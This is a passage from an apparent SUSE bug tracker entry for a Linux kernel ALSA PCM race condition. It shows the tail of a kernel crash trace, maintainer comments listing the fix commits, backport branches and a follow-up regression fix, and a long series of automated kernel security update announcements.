[  141.594861] R13: ffff888035191594 R14: ffff888035191400 R15: ffff888035191468
[  141.594863] RIP: 0010:pm_qos_remove_request+0x204/0x2c0
[  141.594866] Code: 48 c1 ea 03 0f b6 04 02 84 c0 74 08 3c 03 0f 8e 9c 00 00 00 4d 63 6c 24 28 e9 8d fe ff ff 48 c7 c7 e0 44 4d ba e8 7f 10 f1 01 <0f> 0b 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 b8 00 00 00 00 00 fc ff
[  141.594868] FS:  00007fab6baab700(0000) GS:ffff8880c9e80000(0000) knlGS:0000000000000000
[  141.594869] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  141.594871] RSP: 0018:ffff88809d6ffbb8 EFLAGS: 00010282
[  141.594873] CR2: 00007fab66aa0e78 CR3: 000000004d344005 CR4: 00000000000606e0
[  141.594874] RAX: 0000000000000000 RBX: ffffffffc0b416e0 RCX: 0000000000000000
[  141.594876] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffffed1013adff69
[  141.594878] RBP: ffff88809d6ffbe0 R08: 0000000000000001 R09: ffffed10193e551b
[  141.594879] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  141.594881] R10: ffffed10193e551a R11: ffff8880c9f2a8d7 R12: ffff888035191440
[  141.594882] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  141.594884] R13: ffff888035191594 R14: ffff888035191400 R15: ffff888035191468
[  141.594885] Call Trace:
[  141.594888] FS:  00007fab6fab3700(0000) GS:ffff8880c9f00000(0000) knlGS:0000000000000000
[  141.594894]  snd_pcm_common_ioctl+0x5f2/0x1b00 [snd_pcm]
[  141.594896] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  141.594901]  ? snd_pcm_status_user+0x130/0x130 [snd_pcm]
[  141.594903] CR2: 000055cff0604b28 CR3: 000000004d344002 CR4: 00000000000606e0
[  141.594909]  snd_pcm_ioctl+0x6d/0xb0 [snd_pcm]
[  141.594911] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  141.594913] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  141.594915]  do_vfs_ioctl+0x9da/0x1020
[  141.594916] Call Trace:
[  141.594919]  ? ioctl_preallocate+0x1c0/0x1c0
[  141.594922]  ? __kasan_check_write+0x14/0x20
[  141.594927]  snd_pcm_common_ioctl+0x5f2/0x1b00 [snd_pcm]
[  141.594930]  ? __fget+0x21c/0x3d0
[  141.594935]  ? snd_pcm_status_user+0x130/0x130 [snd_pcm]
[  141.594939]  ? copy_fd_bitmaps+0x2e0/0x2e0
[  141.594944]  snd_pcm_ioctl+0x6d/0xb0 [snd_pcm]
[  141.594947]  ? __switch_to_asm+0x40/0x70
[  141.594949]  do_vfs_ioctl+0x9da/0x1020
[  141.594951]  ? __switch_to_asm+0x34/0x70
[  141.594953]  ? ioctl_preallocate+0x1c0/0x1c0
[  141.594955]  ? __switch_to_asm+0x40/0x70
[  141.594957]  ? __kasan_check_write+0x14/0x20
[  141.594960]  ? __fget+0x21c/0x3d0
[  141.594961]  ? __switch_to_asm+0x34/0x70
[  141.594965]  ? __fget_light+0x17e/0x1f0
[  141.594967]  ? copy_fd_bitmaps+0x2e0/0x2e0
[  141.594969]  ? __switch_to_asm+0x40/0x70
[  141.594971]  ksys_ioctl+0x67/0x90
[  141.594974]  ? __switch_to_asm+0x34/0x70
[  141.594976]  __x64_sys_ioctl+0x73/0xb0
[  141.594979]  ? fpregs_assert_state_consistent+0x22/0xa0
[  141.594980]  ? __switch_to_asm+0x40/0x70
[  141.594982]  ? __switch_to_asm+0x34/0x70
[  141.594985]  do_syscall_64+0x9f/0x3c0
[  141.594988]  ? syscall_return_slowpath+0x1a5/0x220
[  141.594990]  ? __fget_light+0x17e/0x1f0
[  141.594993]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  141.594995]  ksys_ioctl+0x67/0x90
[  141.594998] RIP: 0033:0x4e68b7
[  141.595000]  __x64_sys_ioctl+0x73/0xb0
[  141.595002]  ? fpregs_assert_state_consistent+0x22/0xa0
[  141.595004] Code: 4f 55 04 00 85 c0 78 df 48 83 c4 08 48 89 d8 5b 5d c3 90 48 89 e8 48 f7 d8 48 39 c3 0f 92 c0 eb b4 66 90 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[  141.595006] RSP: 002b:00007fab6baaada8 EFLAGS: 00000246
[  141.595008]  do_syscall_64+0x9f/0x3c0
[  141.595009]  ORIG_RAX: 0000000000000010
[  141.595011] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004e68b7
[  141.595012] RDX: 0000000000000000 RSI: 0000000000004112 RDI: 0000000000000003
[  141.595015]  ? syscall_return_slowpath+0x1a5/0x220
[  141.595017] RBP: 00007fab6baaadb0 R08: 00007fab6baab700 R09: 00007fab6baab700
[  141.595019]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  141.595021] RIP: 0033:0x4e68b7
[  141.595022] R10: 00007fab6baab9d0 R11: 0000000000000246 R12: 00007fab6baaae80
[  141.595024] R13: 0000000000000000 R14: 0000000000000000 R15: 00007ffe52234d70
[  141.595026] Code: 4f 55 04 00 85 c0 78 df 48 83 c4 08 48 89 d8 5b 5d c3 90 48 89 e8 48 f7 d8 48 39 c3 0f 92 c0 eb b4 66 90 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[  141.595027] RSP: 002b:00007fab6fab2da8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[  141.595030] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004e68b7
[  141.595031] ---[ end trace 86992d9d3bd66364 ]---
[  141.595033] RDX: 0000000000000000 RSI: 0000000000004112 RDI: 0000000000000003
[  141.595035] RBP: 00007fab6fab2db0 R08: 00007fab6fab3700 R09: 00007fab6fab3700
[  141.595037] R10: 00007fab6fab39d0 R11: 0000000000000246 R12: 00007fab6fab2e80
[  141.595038] R13: 0000000000000000 R14: 0000000000000000 R15: 00007ffe52234d70
[  141.595043] ---[ end trace 86992d9d3bd66365 ]---
```

Comment 11 Takashi Iwai 2022-03-24 07:25:35 UTC

The fixes landed in Linus tree for 5.18-rc1.

92ee3c60ec9fe64404dc035e7c41277d74aa26cb
dca947d4d26dbf925a64a6cfb2ddbc035e831a3d
3c3201f8c7bb77eb53b08a3ca8d9a4ddc500b4c0
69534c48ba8ce552ce383b3dfdb271ffe51820c3

Only the first one really corresponds to this bug (hw_free races), the rest are the further hardening.

Comment 12 Gianluca Gabrielli 2022-03-28 14:43:08 UTC

published to osss

Comment 13 Takashi Iwai 2022-03-28 15:56:41 UTC

Backported to the following branches:
- cve/linux-2.6.32
- cve/linux-3.0
- cve/linux-4.4
- SLE11-SP4-LTSS
- cve/linux-4.12
- SLE12-SP5-LTSS
- SLE15-SP1-LTSS
- cve/linux-5.3
- SLE15-SP3
- SLE15-SP4-GA

The other SLE branches should get the fixes by merging the relevant cve/* branches.

stable branch got the fixes via 5.17.1 stable updates.

Reassigned back to security team.

Comment 14 Takashi Iwai 2022-03-30 10:19:24 UTC

One of the fix patch (commit dca947d4d26d) caused a regression, and I need to rework.  A fix patch will follow.

Comment 15 Takashi Iwai 2022-03-30 13:02:16 UTC

The fix is in sound git tree, will send a PR to Linus in tomorrow.

https://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound.git/commit/?id=bc55cfd5718c7c23e5524582e9fa70b4d10f2433

Comment 17 Takashi Iwai 2022-04-01 08:38:57 UTC

The additional fix was also pushed out.

Reassigned back again to security team.

Comment 38 Swamp Workflow Management 2022-04-12 16:26:20 UTC

SUSE-SU-2022:1163-1: An update that solves 25 vulnerabilities and has 33 fixes is now available.

Category: security (important)
Bug References: 1065729,1156395,1175667,1177028,1178134,1179639,1180153,1189562,1194589,1194625,1194649,1194943,1195051,1195353,1195640,1195926,1196018,1196130,1196196,1196478,1196488,1196761,1196823,1196956,1197227,1197243,1197245,1197300,1197302,1197331,1197343,1197366,1197389,1197460,1197462,1197501,1197534,1197661,1197675,1197677,1197702,1197811,1197812,1197815,1197817,1197819,1197820,1197888,1197889,1197894,1198027,1198028,1198029,1198030,1198031,1198032,1198033,1198077
CVE References: CVE-2021-39698,CVE-2021-45402,CVE-2021-45868,CVE-2022-0850,CVE-2022-0854,CVE-2022-1011,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-1195,CVE-2022-1198,CVE-2022-1199,CVE-2022-1205,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-27223,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: 
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.53.1, kernel-source-azure-5.3.18-150300.38.53.1, kernel-syms-azure-5.3.18-150300.38.53.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.53.1, kernel-source-azure-5.3.18-150300.38.53.1, kernel-syms-azure-5.3.18-150300.38.53.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 39 Swamp Workflow Management 2022-04-13 19:22:30 UTC

SUSE-SU-2022:1183-1: An update that solves 15 vulnerabilities and has 32 fixes is now available.

Category: security (important)
Bug References: 1065729,1156395,1175667,1177028,1178134,1179639,1180153,1189562,1194649,1195640,1195926,1196018,1196196,1196478,1196761,1196823,1197227,1197243,1197300,1197302,1197331,1197343,1197366,1197389,1197462,1197501,1197534,1197661,1197675,1197702,1197811,1197812,1197815,1197817,1197819,1197820,1197888,1197889,1197894,1197914,1198027,1198028,1198029,1198030,1198031,1198032,1198033
CVE References: CVE-2021-45868,CVE-2022-0850,CVE-2022-0854,CVE-2022-1011,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-1195,CVE-2022-1198,CVE-2022-1199,CVE-2022-1205,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: 
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.63.1, kernel-64kb-5.3.18-150300.59.63.1, kernel-debug-5.3.18-150300.59.63.1, kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1, kernel-docs-5.3.18-150300.59.63.1, kernel-kvmsmall-5.3.18-150300.59.63.1, kernel-obs-build-5.3.18-150300.59.63.1, kernel-obs-qa-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1, kernel-source-5.3.18-150300.59.63.1, kernel-syms-5.3.18-150300.59.63.1, kernel-zfcpdump-5.3.18-150300.59.63.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-livepatch-SLE15-SP3_Update_17-1-150300.7.3.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.63.1, kernel-obs-build-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1, kernel-source-5.3.18-150300.59.63.1, kernel-syms-5.3.18-150300.59.63.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.63.1, kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1, kernel-preempt-5.3.18-150300.59.63.1, kernel-source-5.3.18-150300.59.63.1, kernel-zfcpdump-5.3.18-150300.59.63.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 40 Swamp Workflow Management 2022-04-14 10:23:54 UTC

SUSE-SU-2022:1196-1: An update that solves 22 vulnerabilities, contains three features and has 39 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1191580,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196657,1196723,1196761,1196830,1196836,1196901,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1197914,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0001,CVE-2022-0002,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-23960,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.116.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.116.1, kernel-obs-build-4.12.14-122.116.1
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.116.1, kernel-source-4.12.14-122.116.1, kernel-syms-4.12.14-122.116.1
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.116.1, kgraft-patch-SLE12-SP5_Update_30-1-8.3.1
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.116.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 41 Swamp Workflow Management 2022-04-14 13:22:16 UTC

SUSE-SU-2022:1197-1: An update that solves 21 vulnerabilities and has 7 fixes is now available.

Category: security (important)
Bug References: 1179639,1189562,1193731,1194943,1195051,1195254,1195353,1195403,1195939,1196018,1196196,1196468,1196488,1196761,1196823,1196830,1196836,1196956,1197227,1197331,1197366,1197389,1197462,1197702,1197914,1198031,1198032,1198033
CVE References: CVE-2021-0920,CVE-2021-39698,CVE-2021-45868,CVE-2022-0850,CVE-2022-0854,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: 
Sources used:
SUSE Manager Server 4.1 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Manager Retail Branch Server 4.1 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Manager Proxy 4.1 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Server for SAP 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Server 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Server 15-SP2-BCL (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Realtime Extension 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Module for Live Patching 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-livepatch-SLE15-SP2_Update_26-1-150200.5.5.1
SUSE Linux Enterprise Micro 5.0 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise High Availability 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1
SUSE Enterprise Storage 7 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 43 Swamp Workflow Management 2022-04-19 13:25:30 UTC

SUSE-SU-2022:1257-1: An update that solves 33 vulnerabilities, contains one feature and has 9 fixes is now available.

Category: security (important)
Bug References: 1179639,1189126,1189562,1193731,1194516,1194943,1195051,1195254,1195286,1195353,1195403,1195516,1195543,1195612,1195897,1195905,1195939,1195987,1196018,1196079,1196095,1196155,1196196,1196235,1196468,1196488,1196612,1196761,1196776,1196823,1196830,1196836,1196956,1197227,1197331,1197366,1197389,1197462,1197702,1198031,1198032,1198033
CVE References: CVE-2021-0920,CVE-2021-39698,CVE-2021-44879,CVE-2021-45868,CVE-2022-0487,CVE-2022-0492,CVE-2022-0516,CVE-2022-0617,CVE-2022-0644,CVE-2022-0850,CVE-2022-0854,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-24448,CVE-2022-24958,CVE-2022-24959,CVE-2022-25258,CVE-2022-25375,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390,CVE-2022-28748
JIRA References: SLE-23652
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP2 (src):    kernel-rt-5.3.18-150200.79.2, kernel-rt_debug-5.3.18-150200.79.2, kernel-source-rt-5.3.18-150200.79.2, kernel-syms-rt-5.3.18-150200.79.1
SUSE Linux Enterprise Micro 5.0 (src):    kernel-rt-5.3.18-150200.79.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 44 Swamp Workflow Management 2022-04-19 13:30:19 UTC

SUSE-SU-2022:1255-1: An update that solves 20 vulnerabilities, contains one feature and has three fixes is now available.

Category: security (important)
Bug References: 1189562,1194943,1195051,1195353,1196018,1196114,1196468,1196488,1196514,1196639,1196761,1196830,1196836,1196942,1196973,1197131,1197227,1197331,1197366,1197391,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-0886,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise Server 15-LTSS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1, kernel-zfcpdump-4.12.14-150000.150.89.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150000.150.89.1, kernel-livepatch-SLE15_Update_29-1-150000.1.3.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise High Availability 15 (src):    kernel-default-4.12.14-150000.150.89.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 45 Swamp Workflow Management 2022-04-19 13:35:02 UTC

SUSE-SU-2022:1256-1: An update that solves 19 vulnerabilities, contains two features and has 6 fixes is now available.

Category: security (important)
Bug References: 1189562,1193738,1194943,1195051,1195254,1195353,1196018,1196114,1196433,1196468,1196488,1196514,1196639,1196761,1196830,1196836,1196942,1196973,1197227,1197331,1197366,1197391,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234,SLE-23652
Sources used:
openSUSE Leap 15.4 (src):    kernel-debug-4.12.14-150100.197.111.1, kernel-default-4.12.14-150100.197.111.1, kernel-kvmsmall-4.12.14-150100.197.111.1, kernel-vanilla-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
openSUSE Leap 15.3 (src):    kernel-debug-4.12.14-150100.197.111.1, kernel-default-4.12.14-150100.197.111.1, kernel-kvmsmall-4.12.14-150100.197.111.1, kernel-vanilla-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-livepatch-SLE15-SP1_Update_30-1-150100.3.3.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise High Availability 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1
SUSE Enterprise Storage 6 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE CaaS Platform 4.0 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 46 Swamp Workflow Management 2022-04-19 16:29:41 UTC

SUSE-SU-2022:1266-1: An update that solves 20 vulnerabilities, contains three features and has 38 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196723,1196761,1196830,1196836,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197391,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-azure-4.12.14-16.94.1, kernel-source-azure-4.12.14-16.94.1, kernel-syms-azure-4.12.14-16.94.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 47 Swamp Workflow Management 2022-04-19 16:33:54 UTC

SUSE-SU-2022:1267-1: An update that solves 20 vulnerabilities, contains one feature and has 7 fixes is now available.

Category: security (important)
Bug References: 1180153,1189562,1193738,1194943,1195051,1195353,1196018,1196114,1196468,1196488,1196514,1196573,1196639,1196761,1196830,1196836,1196942,1196973,1197211,1197227,1197331,1197366,1197391,1197462,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234
Sources used:
